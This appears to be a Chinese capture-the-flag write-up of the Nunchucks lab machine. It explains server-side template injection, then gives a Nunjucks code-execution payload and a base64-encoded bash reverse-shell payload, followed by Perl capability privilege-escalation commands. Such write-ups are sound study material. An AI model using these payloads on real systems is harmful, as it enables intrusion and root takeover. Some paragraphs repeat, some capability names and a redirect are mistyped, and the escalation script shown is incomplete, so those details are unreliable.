目录
前言
模板:可理解为一段固定好格式文件,只需用户填充信息。通过这种方法,可以做到逻辑与视图分离,更容易、清楚且相对安全地编写前后端不同的逻辑。模板基础形式:
{% ... %} 用来声明变量
{{ ... }} 用来将表达式打印到模板输出
{# ... #} 表示未包含在模板输出中的注释
在模板注入中,主要使用的是{{}} 和 {%%}
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
SSTI:如果用户输入作为【模板当中变量的值】,模板引擎一般会对用户输入进行编码转义,不容易造成XSS攻击。但是如果用户输入作为了【模板内容的一部分】,用户输入会原样输出。
漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。
发现22/80/443端口开放
使用Node.js环境,express服务,可考虑node.js反序列化漏洞,express框架登录绕过等漏洞
访问80端口发现跳转到https://nunchucks.htb
添加到hosts文件
# echo '10.10.11.122 nunchucks.htb' >>/etc/hosts
子域名挖掘
# gobuster vhost -w /usr/share/wordlists/dirb/common.txt -u https://nunchucks.htb/ -k
获取到子域store.nunchucks.htb添加到hosts文件
# echo '10.10.11.122 store.nunchucks.htb' >>/etc/hosts
访问https://store.nunchucks.htb输入邮箱时会输出邮箱,可考虑XSS,并且网站一般不是.jsp/.php/.asp等脚本语言时,那么可能是go/python等其他开发语言架构时,可尝试服务器端模板注入SSTI。
1.1 SSTI测试
使用常规模板{{7*7}}测试
返回信息可知当前存在SSTI漏洞。
1.2 确定模板引擎
站点使用node.js环境搜索nodejs templating engine(node模板引擎)。
发现Nunjucks。
接着搜索Nunjucks templating engine
拿到Payload:{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}}
1.3 SSTI反弹shell
#{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zLzk5OTkgMD4mMSIK| base64 -d |bash')\")()}}@qq.com"
成功拿到user.txt
发现/bin/perl具备cap权限,也可以使用命令定位具备cap权限文件
#getcap -r / 2>dev/null
2.1 CAP_perl常规提权失败
#perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
失败,猜测是perl被限制执行命令。
2.2 验证perl是否被限制部分命令
#perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
回显root,确认是被限制了使用部分命令
2.3 CAP_perl被限制绕过
思路:写一个perl运行环境的脚本test.pl
/*
#!/usr/bin/perl
use POSIX qw(strftime);
use POSIX qw(setuid);
POSIX::setuid(0);
*/
成功拿到root权限
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。
Capability在linux中和suid相似,用来让普通用户具有超级用户权限工作,传统的linux分为超级用户和普通用户,后面增加了capability,用来赋予某个用户去执行高权限指令。
Capability可以分割root权限:
CPA_CHOWN:修改文件属性的权限
CPA_FSETID:允许设置位置文件setuid位
CPA_SETUID:允许改变进程的用户ID
CPA_SETGID:允许改变进程的组ID
CPA_perl,可使用#perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'提升到root权限。
但perl在被限制某些权限时,可考虑创建pl脚本执行/bin/bash成功拿到root权限。